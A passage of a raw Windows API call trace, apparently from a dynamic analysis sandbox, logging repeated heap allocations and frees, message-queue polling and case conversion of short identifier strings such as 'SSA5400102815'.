wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.212] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.212] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.212] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.213] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.213] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.213] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.213] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.213] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.213] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.214] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.214] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.214] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.215] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.215] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.215] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.215] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.216] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.216] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.216] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.217] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.217] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.217] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.218] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24db1d8 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x25c0000, 